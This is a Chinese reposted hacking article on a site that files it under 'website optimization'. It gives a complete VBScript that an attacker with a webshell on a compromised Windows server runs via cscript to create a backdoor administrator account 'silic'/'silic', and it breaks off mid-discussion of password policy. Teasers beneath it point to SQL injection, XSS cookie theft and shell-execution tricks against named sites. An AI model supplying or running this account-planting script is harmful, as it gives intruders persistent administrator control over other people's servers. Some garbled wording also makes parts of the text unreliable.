网站优化

首页 > 新闻资讯 > 网站优化 > 远程组策略及麦咖啡

远程组策略及麦咖啡

2019-09-12 热度:40 ℃

先看第一件
我们在Windows下使用webshell的时候,通常会这样创建一个管理员账户:
在某个可执行目录创建一个XX.vbs,内容大体如下:

set wsnetwork=CreateObject("WSCRIPT.NETWORK")//创建组件
os="WinNT://"&wsnetwork.ComputerName//通讯 

Set ob=GetObject(os)//获取组件
Set oe=GetObject(os&"/Administrators,group")//administrators用户组

Set od=ob.Create("user","silic")//用户名silic
od.SetPassword "silic"//密码silic 

od.SetInfo
Set of=GetObject(os&"/silic",user)

oe.add os&"/silic"

将这段信息保存到c:xx.vbs 然后在command line中执行

cscript c:xx.vbs

这样就成功使用webshell添加了一个管理员。
不过cscript有一个非常非常大的缺点,就是,一般来激昂,这样的vbs添加的账户,名称和密码都非常短,而系统通常对账户的密码长度有限制,是在组策略里面的,例如:

远程组策略及麦咖啡  第1张
 

相关文章

wscript.shell组件被禁用时 可以用Shell.Application执行命令

wscript.shell组件被禁用时 可以用Shell.Application执行命令

wscript.shell 和 shell.application 这两个组件都是来执行程序的,因此是最不安全的组件。目前很多asp木马执行命令都是用的 wscript.shell ,忽...

H3C技术论坛pma漏洞导致主站沦陷

H3C技术论坛pma漏洞导致主站沦陷

H3C技术论坛pma漏洞导致主站沦陷(内部绝密信息,大量用户资料泄漏) 这几天突然对华三的认证起了兴趣,于是去官方论坛下资料。。 下载资料还要JB。。。。 Dz X2,习惯性...

傲游浏览器官网存在SQL注射漏洞

傲游浏览器官网存在SQL注射漏洞

傲游浏览器的插件中心存在POST SQL注射漏洞 http://extension.maxthon.cn/all/index.php or http://chajian.maxth...

代码审计tipask问答系统2.0 ajaxsearch二次编码注入漏洞

代码审计tipask问答系统2.0 ajaxsearch二次编码注入漏洞

Tipask问答系统是一款开放源码的PHP仿百度知道程序。以国人的使用习惯为设计理念,采用MVC构架,系统具有速度快,SEO友好,界面操作简洁明快等特点。 但是Tipask中存在二次编...

多多淘宝客7.4 SQL注入漏洞及其修复方法

多多淘宝客7.4 SQL注入漏洞及其修复方法

下了7.4 3月20号之前的代码,注入确实没修,还是huangou.php $id =$_GET['id']; $good=sel_sql('dhlist&#...

Wordpress插件Front File Manager 0.1任意文件上传漏洞

Wordpress插件Front File Manager 0.1任意文件上传漏洞

标题: Wordpress front file manager 0.1 Arbitrary File Upload   作者: Adrien Thierry &...

图虫网存储型XSS+Cookie泄漏导致账户信息泄漏

图虫网存储型XSS+Cookie泄漏导致账户信息泄漏

存储型XSS+Cookie泄漏导致账户泄漏 EXIF里信息过滤不严格哈~ javascript标签过滤了,script没过滤。   我们来构造个 </A>...

Openvz VPS Iptables进行端口转发

Openvz VPS Iptables进行端口转发

openvz 的vps 一般都是不支持MASQUERADE的,這個是由於內核問題,在VPS管理沒有升級內核的情況下進行轉發可以按照如下辦法。 例如:將IP 1.1.1.1 的7788端...

我们检测到您可能使用 AdBlock 或者其他广告屏蔽插件,导致网页出现错位、变形以及丢失的情况,影响网站内容的阅读。
本站无任何商业广告!为了伍林堂平台的生存,恳请您能够理解,将伍林堂旗下交互产品加入白名单(方法点此),万分感谢!